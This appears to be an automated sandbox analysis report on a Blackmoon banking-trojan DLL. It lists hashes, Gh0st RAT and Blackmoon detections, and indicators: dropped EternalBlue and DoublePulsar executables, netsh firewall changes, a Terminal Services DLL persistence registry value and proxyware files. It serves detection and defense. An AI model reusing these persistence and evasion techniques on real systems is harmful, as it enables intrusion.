blackmoon | 947897f1318cd1e03417c2e4699ac14c2d8b2e4fd7e51a5044fc2d5f8257e738

Analysis

max time kernel
146s
max time network
153s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
27/12/2024, 04:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

947897f1318cd1e03417c2e4699ac14c2d8b2e4fd7e51a5044fc2d5f8257e738.dll
Size

153KB
MD5

0dbc181e2d3c29cff307d69d70df4a80
SHA1

7a7ee57261356957fc9cd66d70771ba0b8609f83
SHA256

947897f1318cd1e03417c2e4699ac14c2d8b2e4fd7e51a5044fc2d5f8257e738
SHA512

cec7c14cb6000620bc31fed4bbc464bd553d091838ddba3b74972ed4f55630aa7d965c822db059bca52c62357e542db521659847892de6c238a4160812ef48e7
SSDEEP

3072:C5VK0lTSG9xoC+CQpiU5M8U3mjfv2JxhGtBx0N4w:d0T9xB+CUamjfvIxhGtB6N

Score

10^/10

blackmoon gh0strat banker discovery evasion persistence privilege_escalation rat trojan upx

Malware Config

Signatures

Blackmoon family
blackmoon
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Detect Blackmoon payload 13 IoCs

resource	yara_rule
behavioral1/memory/2784-52-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2784-10160-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2784-13597-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/files/0x00080000000195c6-13598.dat	family_blackmoon
behavioral1/memory/2784-13610-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2784-13613-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2784-13614-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/files/0x000500000001a7f7-13633.dat	family_blackmoon
behavioral1/memory/2936-13635-0x0000000000400000-0x0000000001BF5000-memory.dmp	family_blackmoon
behavioral1/memory/2784-13649-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2784-13808-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2784-13815-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2784-13818-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon

Gh0st RAT payload 14 IoCs

resource	yara_rule
behavioral1/memory/2808-8-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2808-7-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2808-9-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2808-5-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2808-3-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2808-2-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2808-10-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/2808-13627-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/files/0x000500000001a7f7-13633.dat	family_gh0strat
behavioral1/memory/2936-13635-0x0000000000400000-0x0000000001BF5000-memory.dmp	family_gh0strat
behavioral1/memory/6204-13643-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat
behavioral1/memory/6204-13641-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat
behavioral1/memory/6204-13639-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat
behavioral1/memory/6204-13646-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
Gh0strat family
gh0strat
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 12 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
10012	netsh.exe
9724	netsh.exe
9520	netsh.exe
9364	netsh.exe
5544	netsh.exe
5812	netsh.exe
8932	netsh.exe
8796	netsh.exe
6328	netsh.exe
9132	netsh.exe
8536	netsh.exe
8360	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\GraphicsPerfSvcs\Parameters\ServiceDll = "C:\\Users\\Admin\\AppData\\Roaming\\GraphicsPerfSvcs.dll"	Hooks.exe

Executes dropped EXE 10 IoCs

pid	Process
2784	MpMgSvc.exe
6324	Eternalblue-2.2.0.exe
9812	Eternalblue-2.2.0.exe
564	Wmicc.exe
5552	GetPassword.exe
2936	Hooks.exe
8388	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
2532	ctfmoon.exe
2292	Meson.exe

Loads dropped DLL 64 IoCs

pid	Process
2808	svchost.exe
2808	svchost.exe
2784	MpMgSvc.exe
2784	MpMgSvc.exe
6324	Eternalblue-2.2.0.exe
6324	Eternalblue-2.2.0.exe
6324	Eternalblue-2.2.0.exe
6324	Eternalblue-2.2.0.exe
6324	Eternalblue-2.2.0.exe
6324	Eternalblue-2.2.0.exe
6324	Eternalblue-2.2.0.exe
6324	Eternalblue-2.2.0.exe
6324	Eternalblue-2.2.0.exe
2784	MpMgSvc.exe
9812	Eternalblue-2.2.0.exe
9812	Eternalblue-2.2.0.exe
9812	Eternalblue-2.2.0.exe
9812	Eternalblue-2.2.0.exe
9812	Eternalblue-2.2.0.exe
9812	Eternalblue-2.2.0.exe
9812	Eternalblue-2.2.0.exe
9812	Eternalblue-2.2.0.exe
9812	Eternalblue-2.2.0.exe
2784	MpMgSvc.exe
2784	MpMgSvc.exe
700	cmd.exe
2808	svchost.exe
2808	svchost.exe
948	svchost.exe
2784	MpMgSvc.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
8388	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
1612	Doublepulsar-1.3.1.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe
948	svchost.exe

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	110.11.158.238
Destination IP	1.226.84.135
Destination IP	124.160.26.219

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13200	api6.my-ip.io

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\traffmonetizer\settings.json	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\64[1].jpg	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1680 set thread context of 2808	1680	rundll32.exe	30
PID 948 set thread context of 6204	948	svchost.exe	46

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x002a0000000195bd-15.dat	upx
behavioral1/memory/2784-25-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2784-52-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2784-10160-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2784-13597-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2784-13610-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2784-13613-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2784-13614-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/files/0x000500000001a4ba-13620.dat	upx
behavioral1/memory/2936-13631-0x0000000000400000-0x0000000001BF5000-memory.dmp	upx
behavioral1/memory/2936-13635-0x0000000000400000-0x0000000001BF5000-memory.dmp	upx
behavioral1/memory/2784-13649-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2784-13808-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2784-13815-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2784-13818-0x0000000000400000-0x0000000000D25000-memory.dmp	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Collections.Immutable.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.WebSockets.Client.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Resources.Writer.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Text.Json.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\Microsoft.Diagnostics.NETCore.Client.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.FileSystem.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.Pipes.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Reflection.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.Thread.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Collections.NonGeneric.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Globalization.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.Cryptography.Algorithms.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Text.RegularExpressions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Text.Encodings.Web.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.TraceSource.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.Tracing.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.NameResolution.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.NetworkInformation.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.Numerics.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.Serialization.Xml.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.ValueTuple.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\ctfmoon.exe	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Collections.Specialized.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.ThreadPool.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\Meson.exe	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.ComponentModel.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Console.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Globalization.Calendars.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.AppContext.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Requests.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.CompilerServices.Unsafe.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Text.Encoding.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\Microsoft.Win32.Primitives.dll	svchost.exe
File opened for modification	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.FileVersionInfo.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Http.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.WebSockets.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Text.Encoding.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Buffers.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Collections.Concurrent.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.FileVersionInfo.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Security.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.Principal.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\Microsoft.Bcl.AsyncInterfaces.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.TextWriterTraceListener.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Reflection.Metadata.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Resources.Reader.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.SecureString.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.XmlSerializer.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.ComponentModel.TypeConverter.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Linq.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Memory.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\root_conf\default.toml	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.FileSystem.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.FileSystem.DriveInfo.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Resources.ResourceManager.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.CompilerServices.VisualC.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Globalization.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Numerics.Vectors.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Reflection.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.InteropServices.dll	svchost.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 36 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ctfmoon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Meson.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MpMgSvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Doublepulsar-1.3.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hooks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Doublepulsar-1.3.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Eternalblue-2.2.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Eternalblue-2.2.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wmicc.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time"	Meson.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{646ADAD8-DAC8-41BE-8335-8C0366E934AA}\WpadDecisionTime = 309f55071c58db01	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-492 = "India Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	Meson.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time"	Meson.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-352 = "FLE Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-422 = "Russian Standard Time"	Meson.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time"	Meson.exe
